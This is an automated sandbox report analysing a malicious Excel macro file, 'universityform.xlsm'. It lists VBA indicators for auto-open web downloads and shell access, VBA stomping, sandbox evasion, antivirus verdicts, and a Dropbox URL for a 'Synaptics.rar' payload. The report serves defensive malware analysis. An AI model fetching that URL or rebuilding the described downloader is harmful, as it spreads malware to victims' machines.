Source: universityform.xlsmOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
Source: universityform.xlsmStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
Source: universityform.xlsmStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
Source: universityform.xlsmStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXECOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXECOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}\InProcServer32Jump to behavior
Source: universityform.xlsmOLE, VBA macro line: Private Sub Workbook_Open()
Source: universityform.xlsmOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
Source: universityform.xlsmOLE indicator, VBA macros: true
Source: ~DF0ED33014A7655102.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF28C3246DA78E1C43.TMP.7.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: classification engineClassification label: mal84.expl.evad.winXLSM@4/7@3/2
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$universityform.xlsmJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{D228075B-5AA4-46F0-8F8D-93B8534120F7} - OProcSessId.datJump to behavior
Source: universityform.xlsmOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: universityform.xlsmVirustotal: Detection: 66%
Source: universityform.xlsmReversingLabs: Detection: 68%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\universityform.xlsm"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: universityform.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: universityform.xlsmInitial sample: OLE zip file path = xl/ctrlProps/ctrlProp2.xml
Source: universityform.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
Source: universityform.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: universityform.xlsmInitial sample: OLE zip file path = xl/ctrlProps/ctrlProp9.xml
Source: universityform.xlsmInitial sample: OLE zip file path = xl/ctrlProps/ctrlProp3.xml
Source: universityform.xlsmInitial sample: OLE zip file path = xl/ctrlProps/ctrlProp4.xml
Source: universityform.xlsmInitial sample: OLE zip file path = xl/ctrlProps/ctrlProp5.xml
Source: universityform.xlsmInitial sample: OLE zip file path = xl/ctrlProps/ctrlProp6.xml
Source: universityform.xlsmInitial sample: OLE zip file path = xl/ctrlProps/ctrlProp7.xml
Source: universityform.xlsmInitial sample: OLE zip file path = xl/ctrlProps/ctrlProp8.xml
Source: universityform.xlsmInitial sample: OLE zip file path = xl/ctrlProps/ctrlProp1.xml
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: ~DF0ED33014A7655102.TMP.0.drInitial sample: OLE indicators vbamacros = False
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 1107Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: universityform.xlsmOLE indicator, VBA stomping: true
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information42
Scripting
Valid Accounts3
Exploitation for Client Execution
42
Scripting
1
Process Injection
2
Masquerading
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Obfuscated Files or Information
1
Extra Window Memory Injection
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Extra Window Memory Injection
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture114
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
universityform.xlsm66%VirustotalBrowse
universityform.xlsm68%ReversingLabsDocument-Word.Trojan.Orcinius
universityform.xlsm100%AviraW2000M/Dldr.Agent.17651006
universityform.xlsm100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.210.172
truefalse
    high
    docs.google.com
    172.217.18.14
    truefalse
      high
      www-env.dropbox-dns.com
      162.125.66.18
      truefalse
        high
        s-part-0017.t-0009.t-msedge.net
        13.107.246.45
        truefalse
          high
          www.dropbox.com
          unknown
          unknownfalse
            high
            NameMaliciousAntivirus DetectionReputation
            https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1false
              high
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              162.125.66.18
              www-env.dropbox-dns.comUnited States
              19679DROPBOXUSfalse
              172.217.18.14
              docs.google.comUnited States
              15169GOOGLEUSfalse
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1582321
              Start date and time:2024-12-30 11:10:09 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 4m 38s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:defaultwindowsofficecookbook.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Run name:Without Instrumentation
              Number of analysed new started processes analysed:10
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:universityform.xlsm
              Detection:MAL
              Classification:mal84.expl.evad.winXLSM@4/7@3/2
              EGA Information:Failed
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .xlsm
              • Found Word or Excel or PowerPoint or XPS Viewer
              • Attach to Office via COM
              • Scroll down
              • Close Viewer
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 52.109.32.97, 52.109.28.47, 184.28.90.27, 52.113.194.132, 199.232.210.172, 20.189.173.14, 52.178.17.233, 20.190.160.17, 52.149.20.212, 13.107.246.45
              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, mobile.events.data.microsoft.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, onedscolprdwus13.westus.cloudapp.azure.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, onedscolprdweu08.westeurope.cloudapp.azure.com, uks-azsc-000.roamin
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtCreateKey calls found.
              • Report size getting too big, too many NtQueryAttributesFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtReadVirtualMemory calls found.
              TimeTypeDescription
              05:12:01API Interceptor1129x Sleep call for process: splwow64.exe modified
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              162.125.66.18https://www.dropbox.com/l/scl/AACfaxhMBCajpVJfxiny0jrZK6hv1s8xd2MGet hashmaliciousUnknownBrowse
                bose18mkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                  hnbose1711.batGet hashmaliciousAbobus ObfuscatorBrowse
                    hnl2bose13.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                      2h2xLB9h1L.lnkGet hashmaliciousAbobus ObfuscatorBrowse
                        13jhsfbose.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                          scut18bo03.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                            bose2scut18.batGet hashmaliciousAbobus ObfuscatorBrowse
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              s-part-0017.t-0009.t-msedge.nethttps://N0.kolivane.ru/da4scmQ/#Memily.gamble@amd.comGet hashmaliciousUnknownBrowse
                              • 13.107.246.45
                              phish_alert_sp2_2.0.0.0.emlGet hashmaliciousUnknownBrowse
                              • 13.107.246.45
                              installer64v9.5.7.msiGet hashmaliciousUnknownBrowse
                              • 13.107.246.45
                              zhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                              • 13.107.246.45
                              017069451a4dbc523a1165a2f1bd361a762bb40856778.exeGet hashmaliciousUnknownBrowse
                              • 13.107.246.45
                              http://nemoinsure.comGet hashmaliciousUnknownBrowse
                              • 13.107.246.45
                              https://1drv.ms/o/c/1ba8fd2bd98c98a8/EmMMbLWVyqxBh9Z6zxri2ZUBVkwUpSiY2KbvhupkdaFzGA?e=F6pNlDGet hashmaliciousUnknownBrowse
                              • 13.107.246.45
                              file.exeGet hashmaliciousLummaCBrowse
                              • 13.107.246.45
                              Kellyb Timesheet Report.pdfGet hashmaliciousHTMLPhisherBrowse
                              • 13.107.246.45
                              bg.microsoft.map.fastly.netPayment-Order #24560274 for 8,380 USD.exeGet hashmaliciousAsyncRAT, PureLog Stealer, zgRATBrowse
                              • 199.232.214.172
                              SecuredOnedrive.ClientSetup.exeGet hashmaliciousScreenConnect ToolBrowse
                              • 199.232.214.172
                              dsoft.exeGet hashmaliciousPython Stealer, Creal StealerBrowse
                              • 199.232.210.172
                              Installer eSPT Masa PPh versi 2.0#U007e26022009.exeGet hashmaliciousBlackMoonBrowse
                              • 199.232.210.172
                              Installer eSPT Masa PPh versi 2.0#U007e26022009.exeGet hashmaliciousBlackMoonBrowse
                              • 199.232.214.172
                              SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA Stealer, XmrigBrowse
                              • 199.232.214.172
                              3KFFG52TBI.exeGet hashmaliciousUnknownBrowse
                              • 199.232.214.172
                              a2mNMrPxow.exeGet hashmaliciousUnknownBrowse
                              • 199.232.214.172
                              tzA45NGAW4.lnkGet hashmaliciousUnknownBrowse
                              • 199.232.210.172
                              www-env.dropbox-dns.comFLKCAS1DzH.batGet hashmaliciousUnknownBrowse
                              • 162.125.65.18
                              https://www.dropbox.com/scl/fi/lncgsm76k7l5ix7fuu5t6/2024-OK-House-Outreach.pdf?rlkey=o4qr50zpdw1z14o6ikdg6zjt8&st=lrloyzlo&dl=0Get hashmaliciousUnknownBrowse
                              • 162.125.65.18
                              hnskdfgjgar22.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                              • 162.125.65.18
                              Setup.exeGet hashmaliciousUnknownBrowse
                              • 162.125.65.18
                              Setup.exeGet hashmaliciousUnknownBrowse
                              • 162.125.69.18
                              https://f.io/nWWUxvn6Get hashmaliciousHTMLPhisherBrowse
                              • 162.125.65.18
                              hnsadjhfg18De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                              • 162.125.69.18
                              slifdgjsidfg19.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                              • 162.125.69.18
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              DROPBOXUSFLKCAS1DzH.batGet hashmaliciousUnknownBrowse
                              • 162.125.65.18
                              https://www.dropbox.com/scl/fi/lncgsm76k7l5ix7fuu5t6/2024-OK-House-Outreach.pdf?rlkey=o4qr50zpdw1z14o6ikdg6zjt8&st=lrloyzlo&dl=0Get hashmaliciousUnknownBrowse
                              • 162.125.21.3
                              hnskdfgjgar22.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                              • 162.125.65.18
                              Setup.exeGet hashmaliciousUnknownBrowse
                              • 162.125.69.15
                              Setup.exeGet hashmaliciousUnknownBrowse
                              • 162.125.69.15
                              la.bot.mips.elfGet hashmaliciousMiraiBrowse
                              • 162.125.232.208
                              https://f.io/nWWUxvn6Get hashmaliciousHTMLPhisherBrowse
                              • 162.125.65.18
                              hnsadjhfg18De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                              • 162.125.69.18
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              a0e9f5d64349fb13191bc781f81f42e1Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                              • 162.125.66.18
                              • 172.217.18.14
                              6QLvb9i.exeGet hashmaliciousLummaCBrowse
                              • 162.125.66.18
                              • 172.217.18.14
                              lumma.ps1Get hashmaliciousLummaCBrowse
                              • 162.125.66.18
                              • 172.217.18.14
                              vlid_acid.exeGet hashmaliciousLummaC StealerBrowse
                              • 162.125.66.18
                              • 172.217.18.14
                              AquaPac.exeGet hashmaliciousLummaC StealerBrowse
                              • 162.125.66.18
                              • 172.217.18.14
                              R3nz_Loader.exeGet hashmaliciousLummaCBrowse
                              • 162.125.66.18
                              • 172.217.18.14
                              Loader.exeGet hashmaliciousLummaCBrowse
                              • 162.125.66.18
                              • 172.217.18.14
                              BasesRow.exeGet hashmaliciousLummaCBrowse
                              • 162.125.66.18
                              • 172.217.18.14
                              No context
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):118
                              Entropy (8bit):3.5700810731231707
                              Encrypted:false
                              SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                              MD5:573220372DA4ED487441611079B623CD
                              SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                              SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                              SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
